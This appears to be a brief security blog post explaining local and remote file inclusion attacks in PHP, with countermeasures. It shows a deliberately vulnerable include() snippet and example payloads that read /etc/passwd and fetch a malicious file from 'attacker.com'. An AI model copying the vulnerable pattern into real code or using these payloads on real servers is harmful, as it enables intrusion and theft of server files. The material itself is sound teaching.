If not redirected, please click here https://www.thesecuritybuddy.com/vulnerabilities/what-is-file-inclusion-attack/
In File Inclusion Attack, an
attacker tricks a web server to execute certain scripts and include a
sensitive file from the server or malicious file remotely to the
server with the purpose of performing even more attacks.
File Inclusion Vulnerability occurs
mainly because of poor coding in the web applications. If a user
supplied input is used without proper validation, that leads to this
type of vulnerability.
The purpose of this type of attacks may include :
- Obtaining contents of sensitive files from a web server
- Execution of malicious code in the web server to perpetrate even more attacks
- Performing Cross Site Scripting Attack
- Performing Denial of Service or DoS attacks
- Stealing sensitive data from the web server
How is File Inclusion Attack perpetrated
There are mainly two types of File
Inclusion Attacks :
- Local File Inclusion Attack
- Remote File Inclusion Attack
Local File Inclusion Attack :
In Local File Inclusion Attack, the attacker tricks the web server to include a local sensitive file and reveal its contents to the attacker.
In Local File Inclusion Attack, the attacker tricks the web server to include a local sensitive file and reveal its contents to the attacker.
Let's consider the following piece of code :
<?php
if
( isset( $GET['EYES'] ) ) {
include(
$_GET['EYES'] . '.php' );
}
?>
<form method="get">
<select name="EYES">
<option value="black">Black</option>
<option value="blue">Blue</option>
</select>
<input type="submit">
</form>
Here,
if the attacker executes /eyes.php?EYES=/etc/passwd that will
allow the attacker to read the content of file /etc/passwd from the
web server. This may lead to theft of sensitive data or even more
attacks later. This is a typical example of Local File Inclusion
Attack.
Remote
File Inclusion Attack :
If
we consider the same piece of code that is shown above, the attacker
may execute the following to perform a Remote File Inclusion or RFI
Attack.
- /eyes.php?EYES=http://attacker.com/malicious.txt? : This will inject a malicious file to the web server
- /eyes.php?EYES=C:\\ftp\\upload\\exploit : This will execute code from an already uploaded malicious file 'exploit' which may lead to spread of malware or other attacks.
Countermeasures for File Inclusion Attacks
We can follow some coding practices which may reduce the incidences of File Inclusion Attacks to a large extent.
- When a passed-in path is included, make sure it does not contain unintended character patterns.
- Instead of dynamically generating the path from the URL or form parameter, you can use a predefined switch/case statement to determine which file should be included.
So,
follow some simple rules and safeguard your web applications from
File Inclusion Attacks.
No comments:
Post a Comment